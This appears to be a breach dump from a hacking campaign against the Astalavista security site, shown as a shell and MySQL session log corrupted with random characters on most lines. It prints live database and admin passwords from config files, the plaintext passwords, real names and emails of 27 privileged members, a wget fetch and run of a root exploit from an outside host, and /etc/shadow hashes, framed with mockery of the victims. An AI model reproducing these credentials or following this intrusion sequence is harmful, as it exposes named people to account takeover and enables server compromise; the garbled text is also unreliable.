4 T' }0 g4 |5 \, H9 S; D( ydrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
4 _) H; \0 o, N. ~" b% {drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
* R+ u6 I/ U# {6 W& ^drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com: ]0 _: ]4 V, t' v' X* o
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
$ S# h! [: {% M1 |2 O8 ?drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner& D" d( K+ q/ L3 n
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg, D E( @2 _& e4 @! o* p; F
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config$ X* P& B" k: L3 C* x2 e2 Z
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron& d6 v+ ]) @- g7 q6 F, n# Q
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd# e( T0 R% T7 T6 p- ?2 j
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php- ~9 N) S/ h# W& n2 k( }
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico$ U* u& @3 P6 t$ p. j& Z/ t! @
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
9 G8 y/ z. c8 P" y/ Edrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour" V! y- ?% y% |7 W9 F
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess8 |5 ~) s# u+ f* S2 ~$ m& N1 y
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess8 r9 C, t* |1 f( [/ t
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php+ P# l# I0 z% f. g) O4 O
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html/ m h+ c* r# w# q: L; z
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
1 E; r; f$ {# @ ]+ p" X3 }: J-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php: C7 W; V3 S! J2 N' {; W
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf: l( n% j, y* t0 `# L/ V2 r$ ^9 M( Z
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc5 v4 M% G) ^ s
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang) ?1 D* n0 z* u, C/ E
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
! o' A5 i$ y) {& D% e. u7 fdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
! E- F: Y5 {/ L* hdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member) R) a: I. p& E. R' d0 G* B
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
) ~; R/ ]+ |8 z9 g4 ]5 rdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new/ ]0 f+ b: k; D; H, } f
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
! I1 A" P* L8 M+ z4 r" edrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
^/ V2 y0 H! Y-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
y5 E, u: ^4 X$ E# x. R2 Pdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
, W' e4 r6 Q2 `" B2 w. O6 [drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
& L* T/ {3 {( r/ e8 s/ r. c' w- }, qdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
; y6 i" V$ C: L9 e2 F2 e/ }drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
# z I. T: d/ `) R( r5 d$ hdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
: G" U4 B3 L8 T! K8 odrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
, O. j: ^4 j6 q% \# g7 vdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2( s/ y8 L' J1 H: W3 j
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
$ N; G5 F3 m! i( I' [8 u-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
! _8 u! s- V. o" Tdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki+ A/ N+ Y- s/ p: B1 _
8 ~" s3 B' _. Esh-3.2$ head -20 index.php
7 D. l7 p7 ? P9 A6 `<?PHP. L/ u# } O' j( v! c$ g& h
/**
5 g7 c: o, p2 q6 n* z( ]2 W* Mainfile (external) for astalavistaNET v2.06 r) w. ~- C1 H8 a- T8 @8 L) x3 q
*( x8 N! O6 v' p. l C( V5 @7 s, t0 v
* @copyright Astalavista IT Engineering GmbH$ w- K {* @+ @% M4 X
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>4 f# m7 G* [2 ?2 B0 ~% T, `$ E
* @version 1.0. G0 H& r3 J2 C$ r0 o
*/
( I1 R v; r- _6 N$ N
4 W3 Z$ T5 P8 M! f- T! f* y: {1 o if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {. }! M1 I6 K' W3 {/ ~& _$ j# s
$dontStartSession = false;, _/ I6 g% `% J; G
} else {' H/ B; r) ~, k. x3 S! r: h+ e
$dontStartSession = true;: q& {/ ?$ w5 d* l
}. n: }( @$ l% r. L; H A1 N3 Y
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);! H3 o; X4 F% V+ @7 w ]: T9 l
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);' @ B6 R& P W6 ~8 g$ Z$ {
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);6 j4 J3 k4 ]6 d2 l' g- a
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
( R1 W0 Q" H! b! T
: V, _* j. K6 p9 ]$ Ksh-3.2$ cd config
+ i7 D! b" R# Nsh-3.2$ ls -la
+ [, y) a0 h+ @0 z/ S# H- {total 32
" [+ _+ l, Q' _% Z9 @0 |drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
8 E( e3 z v7 c- f& M- c' edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..0 T, J- f- \; v; |( D a4 P
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php# p' {8 w1 y+ \
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
) h2 [+ S' m* B$ A-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
# h: m' E9 @' m+ d( C0 a: B-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php0 s$ N+ `) o+ A8 j0 x/ i! M
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
0 M' u8 s2 Z8 Q* ~
) f+ I# S$ ?& k: Q% Z# ] U7 ~+ Wsh-3.2$ cat com.conf.php; I6 D- X3 S/ T" H5 J
[snip]' D' g2 U$ l: s" L2 B8 O
//member-database
0 G9 H4 J! h, b- g" t' u9 P$_CONFIG['db_mem_server'] = ‘localhost’;1 {% ~' e1 \/ f3 q' |
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
) D5 ~0 ^/ l2 M$_CONFIG['db_mem_user'] = ‘astanet_db’;
9 N: \5 @" w2 }$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;' A! q' f5 J4 C3 U, L7 M
$_CONFIG['db_mem_debug'] = false; //true or false+ r- B5 J8 x, T5 t* Y+ N6 q
//ads-database
5 H6 ]# x8 K( t4 v; W# }$_CONFIG['db_ads_server'] = ‘localhost’;! D. e) {- \2 w1 ^, M
$_CONFIG['db_ads_database'] = ‘astanet_ads’;4 g& {, e+ C6 \$ i% }8 q
$_CONFIG['db_ads_user'] = ‘astanet_db’;! N3 O$ e" X' m8 R
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;- x% h+ k% Y/ _) b0 W
$_CONFIG['db_ads_debug'] = false; //true or false
, R9 e6 s7 c: F7 g8 j: |//rainbow-database
% {: S9 ?9 S: t1 L# U4 S$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;. q. W7 W# u: m. p0 [$ f5 |* a
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
( I3 J. l" J" S5 U: {* m& q3 O" q$_CONFIG['db_rainbow_user'] = ‘dinu’;
( d" }- P; g; Y! k6 z V. G* I$_CONFIG['db_rainbow_password'] = ‘dinudinu’;$ b7 E6 ?+ g$ N. V
$_CONFIG['db_rainbow_debug'] = false; //true or false
- K* d7 N, W' g$ G: R6 x//mailing lists database
8 n: i& l, ]( X6 }. K( {$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
z% k( {/ p+ e& Q$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;* r. M7 h" s) x. m
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;) ~$ X6 t! ]1 D$ l
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
8 H! `# y1 z2 ^6 p; \( {: R3 f$_CONFIG['db_mailing_lists_debug'] = false; //true or false
: A5 ]7 V7 }3 _( J//paypal( R5 [' Z: k ~
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;. y" n1 x, }) B2 T& g# M1 J* C
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;# {4 {7 m: U! b! M- u( Q
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;: a( p& s! j5 Q5 s2 |7 N1 M
$_CONFIG['sub_pp_noship'] = ‘1′;3 C7 c w' G# C! d2 _
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;; M: `" t! ~, g3 E [6 ^
[snip]6 V0 V" N Z4 {
( H+ k; o) \. ~, [1 V* D' xsh-3.2$ cd ..
! T3 S) u! \& r- t9 S# Ash-3.2$ cd member
N: \- A9 o tsh-3.2$ ls -la
7 l* Z& ~: s6 R! h! u- G! ttotal 20
9 _1 M- \# Z6 A+ e1 y# \) N xdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
4 [" E+ R$ W* M( vdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# i+ v8 d2 t) J-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
& H: o3 ?: \ b8 u: ~-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
0 ~5 p) _: y0 G1 Msh-3.2$ cat .htaccess
' I, w( p6 v' D) K3 ]SecFilterEngine off
! b( x6 w& g* }8 {1 }
' Y. p, f' C0 ]$ @sh-3.2$ cd ..% `9 }: R# R/ ?' t+ j& `% _3 l9 c% H
sh-3.2$ cd cron D' v0 f5 }6 ~7 D
sh-3.2$ ls -la5 c' I r3 W3 V
total 1681 ~2 U) N/ }# Q/ a5 k( P
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
3 D3 u. m0 B) _drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 S, R2 s ~3 i( V
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php C& o* p$ R3 X5 o( [0 {
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
) {- [6 j) l6 k+ }, k-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
1 t0 v9 V1 q% m: |* E! U; J-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
/ U. v- k: N Q. s/ s8 |-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
; S+ o# z: s. K-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php9 v/ v1 Q: W& M
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
/ ~; i4 J7 o; [: Q- Z5 j-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php) h; p# ~& [0 x4 B, R7 c0 J8 K
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh2 W" b) ]& o( Q, A4 A
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php& `$ j; r# {3 X' U7 @
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
& n+ ^$ O3 r8 ]-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php0 X R( \- j3 O
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
$ ?' F7 {4 w, s; W-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
) T8 h; y( [' S7 J6 a& _ k4 E! k-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php( m: l( T6 @% J7 l6 N
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
F7 Z! u! H) X( y-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
9 b* e ^5 a4 s! L8 J& J-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php# N0 h* u$ u/ X0 g: A7 z
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
% [+ V% Q6 A" q3 ]8 ^-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
8 g' f# Q/ Q" r' Y+ K9 t-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
: @9 p3 ^( v# a
% i8 z8 b' b i- ?" ?' p$ dsh-3.2$ cd ..
* S- V7 `$ x8 H# s3 e) g. B* Qsh-3.2$ cd _007+ A$ ~. B8 k/ X" W( k
sh-3.2$ ls -la8 ?% w$ f+ W9 ^1 Z
total 24
# k1 `) M. m7 B: f# U$ sdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
0 k! X- g* ?& f1 f2 u: g2 W+ _drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
7 J. a g, M# y3 J% R-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
- y' n0 u' V C; u0 ]' q-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
0 g/ f* B! H2 k-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php2 `6 O5 u: E5 {5 @- \" ?, F
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap+ J* U# U- N. F. B& ?9 r% j' O
8 V& K! o1 Q0 v: X2 Y2 Z- Nsh-3.2$ cat .htaccess
. N+ O3 R/ ?6 }authType Basic
4 r$ M( u9 _' r) h! i0 M% MauthName Admin( p. S0 ]6 P# ?# x
authUserFile /home/astanet/auth/.htadm_pwd$ T- A1 L5 N# X# J5 [
require valid-user- I2 _ M- T+ W! j2 C5 @4 p
- V5 c+ M( [* E
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
; G4 R5 a4 t9 t X j5 oadmin2net:CR0bl65MwhfT
0 |; h1 \8 c3 [7 O0 c7 v7 o6 `3 k/ J9 F3 B$ R5 o% \
sh-3.2$ mysql -u astanet_db -p
9 F4 @, I0 s2 Q' u+ p5 ?9 g, AEnter password:
( E0 G" t* {) R0 i2 fWelcome to the MySQL monitor. Commands end with ; or \g.
! l- }# a$ x8 B7 F% v5 L' e, {Your MySQL connection id is 275153: b+ n! H1 i6 @# C
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
0 D3 q; C! I3 J; O/ N' d5 o- q0 k2 m; e3 ~
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* f. R; t* c, m* N% ~4 N Y- u- Z9 k" [+ Y$ j& C* M
mysql> show databases;
) b2 C) y/ f1 r) f5 X4 a- U; s+———————–+
; X( X9 k- y4 R# i| Database |$ d! N2 |9 j( X3 ~9 { J6 }+ ?
+———————–+
2 s6 B& h( m; T, z4 I7 s! H| information_schema |) n( t2 R T) Y% c# b' x$ a
| astanet_ads |
3 {. l v' }$ m| astanet_mailing_lists |( d" U, ^% ~3 Z+ l$ t0 h# e
| astanet_mediawiki |
1 Y: S+ }! T; w- p6 r+ d9 I2 |9 B| astanet_membersystem |' C- A+ O0 f. o* o, M: i) t
| test |7 B9 L( f- |/ _
+———————–++ A% @' N1 }1 X( B8 m1 G8 M+ [2 @
6 rows in set (0.00 sec)3 A" j1 a# u! b4 w6 I0 r4 i) z- s# }
! J. l2 e3 k0 d5 C0 T
mysql> use astanet_membersystem6 L; C3 _; C' _ Y
Database changed
+ A. t+ J& a" @mysql> show tables;
5 D7 l& d4 O! K- c6 m+———————————–+
% l3 }, U8 t$ B# p| Tables_in_astanet_membersystem |2 ~7 _% c. K# H# I, W7 r" F
+———————————–+9 W6 _' n) F6 I h/ w
| blacklist_categories |
" ^. g3 ^/ {6 z7 G1 G' k| blacklist_content |
! i" e) z# R m/ u! X| blacklist_levels |5 y1 e4 Q4 K& b' q
| blacklist_mcset |
+ d0 F1 a: N4 g9 `| dir_categories |5 p5 D U' c( I$ q3 _/ E( E2 w
| dir_comments |
) i9 u/ \( Y' N5 s0 P( S! k0 W5 }| dir_links |) @% P" n3 q- ~! e& @
| dir_temp |
" k* |# l7 l- S# || dir_votes |4 o/ V% N/ e |8 _- o6 N
| documents |1 A0 a5 f# I5 z0 o+ k, i
| documents_categories |
/ q. B6 Q3 a% l% V| email_content |
8 |: B" P$ i$ M7 j" ^+ G| email_settings |" K4 Q/ Y+ ~2 \: D+ S# V1 O q' t
| exploits |0 k, v% I3 r+ Y) F
| exploits_categories |. b# N0 w8 i; n) q' I4 {% ?8 D' G
| exploittree_categories |
( T9 e: O! Y1 M7 N| exploittree_exploits |
! A7 B2 M; H+ n: ^| home_values |) u; E# _% t: m% V+ z' m; ]
| iso_countries |. v& b) M% b. h& d r
| links_categories |1 }3 B7 u8 E, D4 B
| links_records |% f1 h/ J/ z3 z9 V2 c0 t3 ]2 T2 G
| links_unauth |3 Q+ q$ P* p3 _1 t' l
| links_votes |
1 c# p+ `1 E M/ ^6 K7 _5 b| log |7 z1 P7 S8 A% ~" s
| news_categories |( o% P7 C; S5 @0 O& P/ i2 |
| news_comments |
( y0 h( R" a! B( G5 r7 `) I) K| news_emoticons |9 I+ {- N1 L: Z3 I7 l
| news_latest |- v! \' E( v- T+ O9 Y9 c
| news_messages | L9 W, u( V- x6 n9 @
| news_statistics |( I N2 Z# W7 b$ y! v
| news_votes |
) @0 U# ~$ D, L1 A| prices_content |# {- }3 [! x5 X1 G% k2 V, g: Z$ a& R' \
| prices_offers |
. W9 S) v- U0 a| rss_settings |2 R5 M ]/ m5 G; k4 D
| sessions |9 D' n% Z& I ~/ q V$ L* l
| stats_signups |
& x6 m% o, o1 C, G& t `4 d+ V| u2u2 |
( _3 I5 L6 ~7 B& v. Y( q| u2u_contact |
9 a8 p' N, ]' a: s4 k6 y| u2u_settings |
5 L! \ z7 t* [8 n# }+ O" u| user_keywords_selected_categories |% H5 @8 U0 [2 U2 l Y& d
| users |
- k, C0 H* C) P9 O G) _| users_ipn_test |
1 {# Y/ h4 ]- \- m) Q| users_keyword_values |( Y. h7 E$ p8 u7 ^' i' ^* |
| users_profile |. j+ m: N' z U+ m! i
| users_temp |% ~ R/ w2 w n. {$ ^4 H
| users_upgrade |
0 r4 H- T6 {8 a: P$ i5 t5 @+———————————–+
1 m5 }4 b+ T) w7 F6 [5 s. K46 rows in set (0.00 sec); y, ~- g' f1 Q; n% _
1 u/ P- Q* \& f( c! D$ ?' u% l& p! smysql> describe users;
& H7 @* c8 `& C% Q6 m$ ]& J+————————–+————————————–+——+—–+———————+—————-+
4 v6 X3 g4 b: W| Field | Type | Null | Key | Default | Extra |( A- Y: R: g: y$ u( x3 r% a
+————————–+————————————–+——+—–+———————+—————-+
Y5 I6 I0 Z3 h| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
6 L+ p; `8 ?: e% z) e5 h1 l% s* `| user | varchar(50) | NO | | | |, U& K4 j9 w" d- P2 p! n
| nickname | varchar(30) | NO | MUL | anonymous | |
0 r' g/ E! ~6 Y! C* i| password | varchar(30) | NO | | | |
% H# o# k# k. t- X! U| userlevel | tinyint(3) | YES | MUL | NULL | |9 T( Z" u @: l, Q7 H6 _: h: f
| exp | int(8) unsigned | NO | | 0 | |; z7 Q( E' s/ t% ~' z! l
| email | varchar(50) | NO | | | |$ ~; K k+ p/ c
| ip | varchar(15) | NO | | 0 | |9 p5 J; ~1 G6 j9 J, J
| proxy | set(’0′,’1′) | NO | | 0 | |
% \8 e' j: q+ b/ T4 Q" g| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
9 C2 Y) ^1 U2 }6 W; }| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |' s2 t0 M8 K0 Z6 W
| anz_in | tinyint(1) | NO | | -1 | |
6 w% g; P$ Y: x9 h7 P| status | tinyint(1) unsigned | NO | | 0 | |8 l' S9 V1 t I
| checked | set(’0′,’1′,’2′) | NO | | 0 | |- B; k6 K9 Z3 ^# Q c& _ ^
| freemember | set(’0′,’1′) | NO | | 0 | |. {5 t: r5 V2 w. c3 D
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |' g7 [+ C- V# [
| lang | tinytext | NO | | | |* x$ |1 e s+ d7 ?7 Q7 @
| adid | smallint(6) | NO | | 0 | |$ |( N2 s2 L8 C8 f4 ?
| pp_txn_id | varchar(255) | YES | | NULL | |- I( ~9 S+ L; x5 [/ f8 _5 ~
| cnb_transaction_id | varchar(255) | YES | | NULL | |
0 `8 c7 e( N/ C| cnb_order_id | varchar(255) | YES | | NULL | |$ M% S. k0 K' c6 [" n) X) k& p
| cnb_user_id | int(11) | YES | | 0 | |
3 [7 x# D8 L, e% g5 q5 Z+————————–+————————————–+——+—–+———————+—————-+
$ @( c/ K( K }; Z) m( r* d8 F8 \2 O22 rows in set (0.01 sec)7 i; c* j! [3 L1 D- Z
! C* k1 u X0 h- k/ u* I; s Omysql> select count(*) as skids from users;
% {) C- m/ s h2 s4 j+ v8 z+——-+" a# A! w! W7 N/ h3 g/ J# d0 u! @
| skids |/ W2 s; Z. l6 A7 n& R) _' n8 a) q
+——-+
8 E+ A: Z+ K4 R) U: e/ z6 ~: u| 25199 |5 i7 O$ @/ O [5 M( G
+——-+
( R8 s C2 `3 S9 h5 d# P$ E1 row in set (0.00 sec)
1 w8 Y; V$ T: z6 {% v5 O
( _" T' M0 ~! q$ y% |# Amysql> select user,nickname,password,email from users where userlevel = 1;" h$ ^0 N1 Q' m" n9 ^% _
+————————–+———————-+——————+———————————–+* I& F" z# L# C" h: l: x
| user | nickname | password | email |
: }- c# E4 V7 X- O+————————–+———————-+——————+———————————–+3 v. o6 D5 g0 U4 }* y# {; N% _& J
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
5 Y. w. _( K* n6 L3 o0 A Y| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
+ O/ J. l. C) W% h( U9 k| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
( @0 j1 w/ C% W1 r, m$ ]) q| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |: A2 k# N1 \" V
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |. u; }7 Z, B8 z) f
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |9 @3 N0 A; `* X. V" z/ z4 m
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |8 V3 R( |. _+ W# {
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
6 R9 _) y- s( J; Y| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
9 V; Z0 G2 ~: w4 }; g' o| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
/ K( l8 U- O% g| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |' A3 {( T, T8 v* k7 v$ J. Q& E
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |1 k; e- F& d3 o+ u! T
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
`, o4 ]& }% _9 N8 O| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |2 \$ D, N6 ^; J5 M; v8 a( {
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |( i3 m+ Z6 C- `
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
( K! A% ?1 Y8 C2 c| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
! ] d3 s- Y+ m: Q T| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |7 X9 Y5 r( {0 L* V% g* A+ _0 W
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |4 z. E% D! i. g! w
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |& G( g9 X. ?: k& m- U7 y
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |/ O1 R8 i L# t& P I
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |; _$ u# @1 p9 v& D. k& J
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |% L( _) J X8 z3 |5 U, r
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |' S. j; J; b7 Z u8 [2 D9 R( B3 @
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |4 k% N$ A7 E8 s1 V: B
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |* P6 k j7 E1 j
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |/ {5 s! X& t( U! _7 L5 Q! d
+————————–+———————-+——————+———————————–+
, w W* L% @( i27 rows in set (0.00 sec); m9 T, V" M* E0 A# ?' Y3 {
. z$ i& U, _ l% [1 }
mysql> exit;: s* O* x! o9 e T- @' J% Z) o
Bye
% Y$ m. C( Z/ Z5 M' w/ l8 p! I+ p! k4 K0 h) L' P
[~] plaintext passwords? yes,
3 b, x; ^, W$ R( ]3 m$ RThose so called “security professionals” who charge you $6.66 / month to
- D+ K" d3 o/ c% c3 @& \$ v. oregister at their hack-proof portal, save your passwords in plaintext…! h% F+ Y' V/ Q2 K. Y$ R$ d
brilliant!7 ^( i A% \/ [& g9 O
% t4 m* m# _" C: G$ t% S. Q[~] This been fun but we want more.5 O6 h1 d/ H& x/ |
; X0 C/ s" s' b) E! L6 ?; s
sh-3.2$ uname -a3 w. \( P& m4 K, B
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux: C4 o+ B d& _
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
) d- W' B$ p$ j- H8 C* r–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
- ]$ t& N/ Y# e6 _3 w& A% {9 ZResolving anti.sec.labs… 13.33.33.37
! L* |# z Z, i2 F& v6 d* ?Connecting to anti.sec.labs|13.33.33.37|:80… connected.
$ a6 I3 k) O5 J+ H' m: r7 }HTTP request sent, awaiting response… 200 OK* R# z* x9 t+ L+ R8 ?4 }8 w& s
Length: 18200 (18K) [text/plain]; o! F% L& h. y1 X, k9 Z8 _
Saving to: `g0troot’
5 \% Y M* H$ O( B1 y6 t, ^+ `8 H4 u. H
100%[=========================================================================================================================================>] 18,200 58.6K/s in
* t. M. g) a1 F. J' ]0.3s. e; Q2 I) \0 R/ ~" B) \
, B7 n+ q- U0 G9 |* q4 f
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]7 k# U. ^" h* n& `( C/ d( x- z
, t+ _ b( K) zsh-3.2$ ./g0troot -i x86_64
/ S7 r: |. o% Q- N( }" O7 q[+] g0troot - anti.sec.labs8 M- t6 \1 A" ^" ^9 J
[+] Target: 2.6.18-128.1.10.el51 k& ^* E8 v2 L* i* k# ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
}' r& g. F3 i: S
7 R/ j( G3 k" a( _* M# R/ R[+] r00tr00t
1 U7 i" ?9 b5 w. y; R8 X[~] Executing shell…" \4 p; n0 ]* D; R+ F' e- _! V
( t1 O# f& _% b! O$ X
sh-3.2# id; M6 s+ d. C/ M% ]' ~
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
- a% r8 [" a" a m C. P/ V7 J; R5 H1 U8 O1 }
sh-3.2# cat /etc/shadow$ Y% i# J5 p7 A& F, P3 ?) \
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::1 X+ x6 v4 T8 W( x' I% a
[snip]; H [% q5 [& g
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::, X$ a: x1 ~) a" f& a: Q6 T2 M
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::" ~1 ]# f. R" `( d4 T, E
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
